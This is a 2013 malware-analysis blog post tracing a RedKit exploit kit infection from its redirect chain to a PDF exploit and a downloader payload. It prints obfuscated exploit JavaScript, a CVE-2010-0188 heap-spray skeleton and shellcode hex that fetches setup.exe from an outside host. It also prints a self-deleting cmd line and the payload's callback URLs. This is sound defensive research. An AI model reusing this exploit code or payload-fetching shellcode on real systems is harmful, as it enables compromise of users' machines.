Saturday, January 12, 2013

Once upon a time with another Red Kit infection & its Payload

I was eager to see another Exploit Kit infection in action in this Crusade, some efforts was made but I was bumped into some other non-EK infectors in here and there before finally finding the below infector url. I was really hoping this is a Cool Exploit Kit but ending up to be RedKit pack.
supportservice060.ru/flow2.php
(Thank's to @MalwareSigs tips) that's how the adventure began, and went to the landing page below:

*) As reference here's our previous Red Kit analysis-->>[HERE]
OK. Here's the story:
First of all the route of this case's infection scheme is as follows:
Infector Page (flow2.php) 91.243.115.140 supportservice078.ru Infector "Ticket" confirmator (/vd/5;b068d006acd6b9e6e371e501d35be2a7) 46.166.169.238 gzqxj.portrelay.com TDS Redirector page (/tds/in.cgi?9 ) 91.243.115.140 supportservice078.ru RedKit Redirector & Landing pages (hiqy.html) 81.169.145.163 schloss-beratung.de // 302 to other landing page 74.53.109.128 windermerecottage.co.uk // the landing page + payload *) PS: Better watch IPs, domains & DNS used by these↑ infector scheme!
It is not like the blackhole, Red Kit use a good confirmation scheme and - a TDS redirector for each access arrived. Infector page, ticket confirmator - and TDS are a set of barricade. Behind those, the Red Kit hosts looks can be - setup to forward infection one to another host by round-robin scheme via - HTTP flag 302. Let's see the following log detail carefully as PoC. We access the infector url:
--02:24:22--  h00p://supportservice060.ru/flow2.php
Resolving supportservice060.ru... seconds 0.00, 91.243.115.140
Caching supportservice060.ru => 91.243.115.140
Connecting to supportservice060.ru|91.243.115.140|:80... seconds 0.00, connected.
  :
GET /flow2.php HTTP/1.0
Accept: */*
Host: supportservice060.ru
Connection: Keep-Alive
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 13:27:04 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 91
Connection: close
Content-Type: text/html; charset=UTF-8
  :
200 OK
Length: 91 [text/html]
02:24:25 (1.55 MB/s) - `flow2.php' saved [91/91]
The inside contains:
<iframe src="h00p://supportservice078.ru/tds/in.cgi?default" height="3" width="3">
So we fetched it further, turns out to be a long way to go.. before get he downloads..
--02:27:23--  h00p://supportservice078.ru/tds/in.cgi?default
Resolving supportservice078.ru... seconds 0.00, 91.243.115.140
Caching supportservice078.ru => 91.243.115.140
Connecting to supportservice078.ru|91.243.115.140|:80... seconds 0.00, connected.
  :
GET /tds/in.cgi?default HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
Host: supportservice078.ru
Connection: Keep-Alive
HTTP request sent, awaiting response...
  :
HTTP/1.1 302 Found
Date: Fri, 11 Jan 2013 13:30:02 GMT
Server: Apache/2.2.15 (CentOS)
Location: h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7
  :
302 Found
Location: h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7 [following]

--02:27:24--  h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7
           => `5'
Resolving gzqxj.portrelay.com... seconds 0.00, 46.166.169.238
Caching gzqxj.portrelay.com => 46.166.169.238
Connecting to gzqxj.portrelay.com|46.166.169.238|:80... seconds 0.00, connected.
  :
GET /vd/5;b068d006acd6b9e6e371e501d35be2a7 HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
User-Agent: MalwareMustDie is Sleepy
Accept: */*
Host: gzqxj.portrelay.com
Connection: Keep-Alive
HTTP request sent, awaiting response...
  :
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 11 Jan 2013 19:29:36 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.20
Location: h00p://supportservice078.ru/tds/in.cgi?9
Vary: Accept-Encoding,User-Agent
  :
302 Found
Location: h00p://supportservice078.ru/tds/in.cgi?9 [following]
Skipping 0 bytes of body: [] done.
--02:27:25--  h00p://supportservice078.ru/tds/in.cgi?9
           => `in.cgi@9'
conaddr is: 46.166.169.238
Found supportservice078.ru in host_name_addresses_map (003D52C8)
Connecting to supportservice078.ru|91.243.115.140|:80... seconds 0.00, connected.
  :
GET /tds/in.cgi?9 HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
User-Agent: MalwareMustDie is Sleepy
Accept: */*
Host: supportservice078.ru
Connection: Keep-Alive
Cookie: TSUSER=vdelecc; vbpnx10=_1_; vbpnxdefault=_10_; vbpnxvdelecc=_1_
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 302 Found
Date: Fri, 11 Jan 2013 13:30:03 GMT
Server: Apache/2.2.15 (CentOS)
Location: h00p://schloss-beratung.de/hiqy.html
  :
302 Found
Location: h00p://schloss-beratung.de/hiqy.html [following]
  :
--02:27:25--  h00p://schloss-beratung.de/hiqy.html
           => `hiqy.html'
conaddr is: 46.166.169.238
Resolving schloss-beratung.de... seconds 0.00, 81.169.145.163
Caching schloss-beratung.de => 81.169.145.163
Found schloss-beratung.de in host_name_addresses_map (003D6640)
Connecting to schloss-beratung.de|81.169.145.163|:80... seconds 0.00, connected.
  :
GET /hiqy.html HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
User-Agent: MalwareMustDie is Sleepy
Accept: */*
Host: schloss-beratung.de
Connection: Keep-Alive
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 302 Moved Temporarily
Date: Fri, 11 Jan 2013 17:27:18 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8r
X-Powered-By: PHP/5.2.17
Set-Cookie: d3e4aec0be51dc536dfa324cc2df3903=1927452e1f33f00606657af59fa38408; expires=Fri, 18-Jan-2013 17:27:18 GMT; path=/
Location: h00p://windermerecottage.co.uk/hiqy.htm
Connection: close
Content-Type: text/html
  :
302 Moved Temporarily
Location: h00p://windermerecottage.co.uk/hiqy.htm [following]

--02:27:26--  h00p://windermerecottage.co.uk/hiqy.htm
           => `hiqy.htm'
conaddr is: 46.166.169.238
Resolving windermerecottage.co.uk... seconds 0.00, 74.53.109.128
Caching windermerecottage.co.uk => 74.53.109.128
Found windermerecottage.co.uk in host_name_addresses_map (003D6B10)
Connecting to windermerecottage.co.uk|74.53.109.128|:80... seconds 0.00, connected.
  :
GET /hiqy.htm HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
User-Agent: MalwareMustDie is Sleepy
Accept: */*
Host: windermerecottage.co.uk
Connection: Keep-Alive
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 17:27:18 GMT
Server: Apache
Content-Length: 13283
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html
  :
200 OK
Length: 13,283 (13K) [text/html]
02:27:27 (2.93 MB/s) - `hiqy.htm' saved [13283/13283]
This hiqy.htm is a landing page script, with 2 jars + 1 pdf infector. To get into hiqy.htm, we must 1st get through the gate at↓
supportservice078.ru/tds/in.cgi?9
↑which its script & our used access parameter will be the keys to which infector - we will be forwarded. The landing page source: You'll see neutralized landing page code here -->>[PASTEBIN] For analysis I breakdown the code in here -->>[PASTEBIN] The landing page has the jars download urls below:
windermerecottage.co.uk/332.jar
windermerecottage.co.uk/887.jar
but I can't grab them, bumped with 404. Log:
GET /332.jar HTTP/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: windermerecottage.co.uk
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
HTTP request sent, awaiting response...
HTTP/1.1 404 Not Found
Date: Fri, 11 Jan 2013 17:45:57 GMT
There's a RedKit reference ->>[HERE] explained the way to fetch jars - by the direct link to the 33.html and 41.html via jars to download, but this - wasn't work well & returning a zero byte file, I guess the params are unmatched, PoC:
Resolving windermerecottage.co.uk... seconds 0.00, 74.53.109.128
Caching windermerecottage.co.uk => 74.53.109.128
Connecting to windermerecottage.co.uk|74.53.109.128|:80... seconds 0.00, connected.
GET /62.html HTTP/1.0
Referer: h00p://windermerecottage.co.uk/hiqy.htm
User-Agent: MalwareMustDie
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: windermerecottage.co.uk
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Sat, 12 Jan 2013 08:34:35 GMT
Server: Apache
Content-Length: 0
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html
200 OK
Length: 0 [text/html]
17:34:44 (0.00 B/s) - `62.html' saved [0/0]
BUT! There's also a PDF url which I just downloaded it right away :-)
--02:47:09--  h00p://windermerecottage.co.uk/987.pdf
Resolving windermerecottage.co.uk... seconds 0.00, 74.53.109.128
Caching windermerecottage.co.uk => 74.53.109.128
Connecting to windermerecottage.co.uk|74.53.109.128|:80... seconds 0.00, connected.
GET /987.pdf HTTP/1.0
Referer: h00p://windermerecottage.co.uk/hiqy.htm
User-Agent: MalwareMustDie is Sleepy
Host: windermerecottage.co.uk
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 17:47:01 GMT
Server: Apache
Content-Disposition: inline; filename=5c6bcd22.pdf
Content-Length: 6418
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/pdf
200 OK
Length: 6,418 (6.3K) [application/pdf]
02:47:10 (126.64 MB/s) - `987.pdf' saved [6418/6418]
There is a Javascript like below at in the PDF at 0xB1D-0x185C:
drols1 = event;
gerpsoi=  "/*dbgbgfgd dswd*/CHoedsp0DCHoedsp0ACHoedsp76CHoe
edsp3BCHoedsp0DCHoedsp0ACHoedsp76CHoedsp61CHoedsp72CHoedsp2
20CHoedsp5FCHoedsp6BCHoedsp5FCHoedsp6DCHoedsp28CHoedsp29CHo
oedsp71CHoedsp56CHoedsp29CHoedsp0DCHoedsp0ACHoedsp7BCHoedsp
p71CHoedsp56CHoedsp29CHoedsp3BCHoedsp0DCHoedsp0ACHoedsp72CH
Hoedsp7BCHoedsp0DCHoedsp0ACHoedsp76CHoedsp61CHoedsp72CHoeds
sp3BCHoedsp0DCHoedsp0ACHoedsp76CHoedsp65CHoedsp72CHoedsp20C
CHoedsp6ECHoedsp67CHoedsp74CHoedsp68CHoedsp20CHoedsp3CCHoed
dsp28CHoedsp76CHoedsp65CHoedsp72CHoedsp2CCHoedsp20CHoedsp31
2CHoedsp6CCHoedsp6FCHoedsp63CHoedsp6BCHoedsp28CHoedsp78CHoe
edsp20CHoedsp32CHoedsp20CHoedsp3CCHoedsp20CHoedsp6CCHoedsp6
   :
   :
..Hoedsp7DCHoedsp0DCHoedsp0A";

drols=drols1.target.creator;
function tplax(search, replace, subject) {
return subject.split(search).join(replace);}
function botoe(frodola,fiiio)
{ valueOf[cmfi](frodola);
valueOf[cmfi](Midias);} 
var dsprpa = "i%ppd"; 
var cmfi = "e"+ drols1.target.author.toLowerCase().split("").reverse().join("");
ery= tplax("Anila/VCa;",'',drols);
botoe(ery,12);
var xchdfjh;
The PDF Evil JavaScript Source. Here's the evil code (neutralized) -->>[PASTEBIN] I use this code to get payload by simply simulate it ->>[PASTEBIN] There's an exploit CVE-2010-0188 in the decoded code, for the shellcode - execution, with the below structure:
splaui();
function splaui(){
  var ver = get_ver();
  if (ver >= 0x1f40){          // Exploit CVE-2010-0188
    var tiff = 'SUkqADggAABB';  // LibTiff Integer aimed for overflow
    var nops = make_str('QUFB', 0x2ae8);
    var start = '
QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAA
EAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    var foot = '';
    var sc_hex = '';
    if (ver < 0x2009){  // determining Adobe version before exloit..
      foot = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
      var sc_hex = ''4c206..000'; //Shellcode
    }
    else { foot = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
          sc_hex = '4c206..000';} //Shellcode 
    if (foot.length){
      var ret = [tiff, nops, start, foot].join('');
      var sc_str = hex2str(sc_hex);
      var scode = str2uni(sc_str);
      heap_spray3(scode);
      rVBGo.rawValue = ret; }}}
And the shellcode is the below neutralized code:
4c 2O 6O Of O5 17 8O 4a  3c 2O 6O Of Of 63 8O 4a   L.`....J<.`..c.J
a3 eb 8O 4a 3O 2O 82 4a  6e 2f 8O 4a 41 41 41 41   ...JO..Jn/.JAAAA
26 OO OO OO OO OO OO OO  OO OO OO OO OO OO OO OO   &...............
12 39 8O 4a 64 2O 6O Of  OO O4 OO OO 41 41 41 41   .9.Jd.`.....AAAA
41 41 41 41 66 83 e4 fc  fc 85 e4 75 34 e9 5f 33   AAAAf......u4._3
cO 64 8b 4O 3O 8b 4O Oc  8b 7O 1c 56 8b 76 O8 33   .d.@O.@..p.V.v.3
db 66 8b 5e 3c O3 74 33  2c 81 ee 15 1O ff ff b8   .f.^<.t3,.......
8b 4O 3O c3 46 39 O6 75  fb 87 34 24 85 e4 75 51   .@O.F9.u..4$..uQ
e9 eb 4c 51 56 8b 75 3c  8b 74 35 78 O3 f5 56 8b   ..LQV.u<.t5x..V.
76 2O O3 f5 33 c9 49 41  fc ad O3 c5 33 db Of be   v...3.IA....3...
             < C U T >
44 24 O8 2O 2d 73 2O 53  68 f8 OO OO OO ff 56 Oc   D$..-s.Sh.....V.
8b e8 33 c9 51 c7 44 1d  OO 77 7O 62 74 c7 44 1d   ..3.Q.D..wpbt.D.
O5 2e 64 6c 6c c6 44 1d  O9 OO 59 8a c1 O4 3O 88   ..dll.D...Y...O.
44 1d O4 41 51 6a OO 6a  OO 53 57 6a OO ff 56 14   D..AQj.j.SWj..V.
85 cO 75 16 6a OO 53 ff  56 O4 6a OO 83 eb Oc 53   ..u.j.S.V.j....S
ff 56 O4 83 c3 Oc eb O2  eb 13 47 8O 3f OO 75 fa   .V........G.?.u.
47 8O 3f OO 75 c4 6a OO  6a fe ff 56 O8 e8 9c fe   G.?.u.j.j..V....
ff ff 8e 4e Oe ec 98 fe  8a Oe 89 6f O1 bd 33 ca   ...N.......o..3.
8a 5b 1b c6 46 79 36 1a  2f 7O 68 74 74 7O 3a 2f   .[..Fy6./phttp:/
2f 77 69 6e 64 65 72 6d  65 72 65 63 6f 74 74 61   /windermerecotta
67 65 2e 63 6f 2e 75 6b  2f 36 32 2e 68 74 6d 6c   ge.co.uk/62.html
OO OO                                              ..
And you cen see the un-obfuscated url for the payload in the end of the shellcode:
h00p://windermerecottage.co.uk/62.html
If you fetch it you'll get the binary malware setup.exe:
GET /62.html HTTP/1.0
Host: windermerecottage.co.uk
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 17:58:41 GMT
Server: Apache
Expires: Mon, 20 Aug 2002 02:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename=setup.exe <====
Content-Length: 42496
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/octet-stream
200 OK
Length: 42,496 (42K) [application/octet-stream]
02:58:51 (128.68 KB/s) - `62.html' saved [42496/42496]
Looks like this:
Sections:
   .code  0x1000 0x21f0  8704
   .text  0x4000 0x41b4 16896
   .rdata 0x9000 0x13c    512
   .data  0xa000 0xd04   2560
   .rsrc  0xb000 0x319c 12800

Compilation timedatestamp.....: 2013-01-11 15:44:17
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00001000
packer: PureBasic 4.x -> Neil Hodgson - additionalPureBasic 4.x -> Neil Hodgson

0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   50 45 00 00 4C 01 05 00 51 33 F0 50 00 00 00 00    PE..L...Q3.P....
0090   00 00 00 00 E0 00 0F 01 0B 01 02 32 00 64 00 00    ...........2.d..
00A0   00 42 00 00 00 00 00 00 00 10 00 00 00 10 00 00    .B..............
00B0   00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00    ......@.........
 :                          :                                   :
After de-pack the binary, I found the below CMD command:
cmd.exe /c ping -n 1 -w 2000 192.168.123.254 > nul & del %s
↑for the self-deletion purpose. And the complete strings are here -->>[PASTEBIN] If we execute this malware, we'll see setup.exe injected itself to a process: And it started making a DNS calls to the hosts below:
cash.taxi-soyuz.ru IN A +
orderindiantoronto.com IN A +
craportuense.com IN A +
stevenyang.ca IN A +
goediving.com IN A +
triathlonclub.sakura.ne.jp IN A +
ouedknouz.com IN A +
basement-gallery.com IN A +
boersenkeller-frankfurt.de IN A +
ex9.com.br IN A +
You can see the snapshot process' network activity: With more detail PoC in Wireshark: And starts making the HTTP/GET requests to below urls:
h00p://basement-gallery.com/h.htm
h00p://craportuense.com/i.htm
h00p://ouedknouz.com/c.htm
h00p://stevenyang.ca/p.htm
h00p://orderindiantoronto.com/k.htm
h00p://goediving.com/g.htm
h00p://ex9.com.br/t.htm
h00p://boersenkeller-frankfurt.de/w.htm
h00p://cash.taxi-soyuz.ru/l.htm
h00p://triathlonclub.sakura.ne.jp/o.htm
PoC: Actually these requests was so rapid & fast. In 3minutes it was 16,000+ requests: Not all the requests succeed reach the mothership, PoC:
--04:07:17--  h00p://triathlonclub.sakura.ne.jp/o.htm
Resolving triathlonclub.sakura.ne.jp... 59.106.27.164
Connecting to triathlonclub.sakura.ne.jp|59.106.27.164|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:07:18 ERROR 404: Not Found.

--04:07:57--  h00p://boersenkeller-frankfurt.de/w.htm
Resolving boersenkeller-frankfurt.de... 81.28.232.71
Connecting to boersenkeller-frankfurt.de|81.28.232.71|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:07:59 ERROR 404: Not Found.

--04:08:43--  h00p://orderindiantoronto.com/k.htm
Resolving orderindiantoronto.com... 174.132.192.130
Connecting to orderindiantoronto.com|174.132.192.130|:80... connected.
HTTP request sent, awaiting response... 500 Internal Server Error
04:08:44 ERROR 500: Internal Server Error.

--04:09:17--  h00p://ex9.com.br/t.htm
Resolving ex9.com.br... 200.98.246.160
Connecting to ex9.com.br|200.98.246.160|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
04:09:19 (0.00 B/s) - `t.htm' saved [0/0]

--04:09:44--  h00p://stevenyang.ca/p.htm
Resolving stevenyang.ca... 216.187.92.109
Connecting to stevenyang.ca|216.187.92.109|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:09:45 ERROR 404: Not Found.

--04:10:11--  h00p://cash.taxi-soyuz.ru/l.htm
Resolving cash.taxi-soyuz.ru... 217.16.21.192
Connecting to cash.taxi-soyuz.ru|217.16.21.192|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:10:12 ERROR 404: Not Found.

--04:11:05--  h00p://ouedknouz.com/c.htm
Resolving ouedknouz.com... 213.186.33.3
Connecting to ouedknouz.com|213.186.33.3|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
04:11:06 (0.00 B/s) - `c.htm' saved [0/0]

--04:11:30--  h00p://goediving.com/g.htm
Resolving goediving.com... 72.167.232.31
Connecting to goediving.com|72.167.232.31|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
04:11:31 (0.00 B/s) - `g.htm' saved [0/0]

--04:12:23--  h00p://craportuense.com/i.htm
Resolving craportuense.com... 94.127.190.21
Connecting to craportuense.com|94.127.190.21|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
04:12:25 (0.00 B/s) - `i.htm' saved [0/0]

--04:12:49--  h00p://cash.taxi-soyuz.ru/l.htm
Resolving cash.taxi-soyuz.ru... 217.16.21.192
Connecting to cash.taxi-soyuz.ru|217.16.21.192|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:12:49 ERROR 404: Not Found.
↑these domains served the htm file are- actually a compromised servers & implemented with the RedKit responder. Additionally, all of requests are using fake user agent below:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
↑This is important for compromised servers above to check access logs. BTW, one of the callback host has exceeded its HTTP traffic quota ;-)) We can't see significant registry changed or other dropped file except - the operations mentioned above. And furthermore, the malware process will suddenly stop/exit without errors. The previous case [HERE] also shows the same payload at the first infection. So, it is a nature of RedKit pack to download for more malwares by first payload. But this time all callback hosts looks unavailable to serve :-) I still wonder WHAT IF the callbacks are successfully returning response.. Virus Total checks currently shows only 5 AntiVirus can initially detect this first payload as malware:
SHA1: 7672f68845b3e43be76eb21559ae0f8e02407e6f MD5: 92899c20da4d9db5627af89998aadc58 File size: 41.5 KB ( 42496 bytes ) File name: setup.exe File type: Win32 EXE Tags: peexe Detection ratio: 5 / 46 Analysis date: 2013-01-11 19:15:32 UTC ( 2 hours, 48 minutes ago ) URL --->>[VirusTotal] Malware Names: Fortinet : W32/Zbot.ANM!tr Malwarebytes : Trojan.Bublik ByteHero : Virus.Win32.Heur.c Kaspersky : UDS:DangerousObject.Multi.Generic Ikarus : Trojan-Downloader.Win32.Karagany
Here's the full sample of this infection: Samples can be downloaded here -->>[MEDIAFIRE] PCAP & Regshot data can be downloaded here -->>[MEDIAFIRE] Detection rates is as follows (click the front numbers for link)
[1] Landing page VT (2/46) [2] PDF Infector VT (5/46) [3] Payload VT (5/46)
There are huge recent infection of Red Kit, which can be found below, as per announced by our fellow crusader: (thank's to @Set_Abominae) *) [NEW] CURRENT UrlQuery Link for RedKit -->>[HERE]
#MalwareMustDie

2 comments:

  1. I listed some of the domains here, although my personal recommendation is to block:
    91.243.115.0/24
    46.166.169.0/24
    62.76.184.0/21

    ReplyDelete
    Replies
    1. Great advice, thank you! And just read your recommendation < 100% on your side for what you wrote is true fact.

      MMD blog also being used as evidence of crime so we wrote what can we positive proof with malware details evidence.
      We research, expose infection logic + PoC of crime, and shutdown process < our loops.
      By God speed, together, we will decrease infector systematically.

      Delete